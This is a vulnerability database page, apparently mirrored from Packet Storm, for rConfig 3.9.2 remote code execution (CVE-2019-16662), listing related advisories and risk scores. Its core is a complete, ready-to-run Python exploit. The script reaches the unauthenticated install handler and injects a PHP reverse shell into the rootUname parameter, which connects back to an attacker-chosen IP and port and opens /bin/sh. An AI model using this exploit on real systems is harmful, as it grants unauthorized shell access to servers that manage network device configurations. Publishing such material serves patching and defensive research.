Lucene search
K

rConfig 3.9.2 Remote Code Execution

🗓️ 29 Oct 2019 00:00:00Reported by AskarType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 230 Views

rConfig 3.9.2 Remote Code Execution, CVE-2019-16662, CentOS 7.7, PHP 7.2.2

Related
Code
ReporterTitlePublishedViews
Family
0day.today
rConfig 3.9.2 - Remote Code Execution Exploit
29 Oct 201900:00
zdt
0day.today
rConfig - install Command Execution Exploit
9 Nov 201900:00
zdt
ATTACKERKB
CVE-2019-16662
28 Oct 201900:00
attackerkb
Circl
CVE-2019-16662
3 Nov 201912:10
circl
Check Point Advisories
rConfig Remote Code Execution (CVE-2019-16662; CVE-2019-16663)
5 Nov 201900:00
checkpoint_advisories
CVE
CVE-2019-16662
28 Oct 201911:52
cve
Cvelist
CVE-2019-16662
28 Oct 201911:52
cvelist
Cvelist
CVE-2019-16663
28 Oct 201911:53
cvelist
GithubExploit
Exploit for CVE-2019-19268
25 Nov 201911:14
githubexploit
Exploit DB
rConfig 3.9.2 - Remote Code Execution
29 Oct 201900:00
exploitdb
Rows per page
`# Exploit Title: rConfig 3.9.2 - Remote Code Execution  
# Date: 2019-09-18  
# Exploit Author: Askar  
# Vendor Homepage: https://rconfig.com/  
# Software link: https://rconfig.com/download  
# Version: v3.9.2  
# Tested on: CentOS 7.7 / PHP 7.2.22  
# CVE : CVE-2019-16662  
  
#!/usr/bin/python  
  
import requests  
import sys  
from urllib import quote  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  
  
if len(sys.argv) != 4:  
print "[+] Usage : ./exploit.py target ip port"  
exit()  
  
target = sys.argv[1]  
  
ip = sys.argv[2]  
  
port = sys.argv[3]  
  
payload = quote(''';php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'#'''.format(ip, port))  
  
install_path = target + "/install"  
  
req = requests.get(install_path, verify=False)  
if req.status_code == 404:  
print "[-] Installation directory not found!"  
print "[-] Exploitation failed !"  
exit()  
elif req.status_code == 200:  
print "[+] Installation directory found!"  
url_to_send = target + "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=" + payload  
  
print "[+] Triggering the payload"  
print "[+] Check your listener !"  
  
requests.get(url_to_send, verify=False)  
  
  
rConfig-preauth.png  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Oct 2019 00:00Current
9.6High risk
Vulners AI Score9.6
EPSS0.97702
230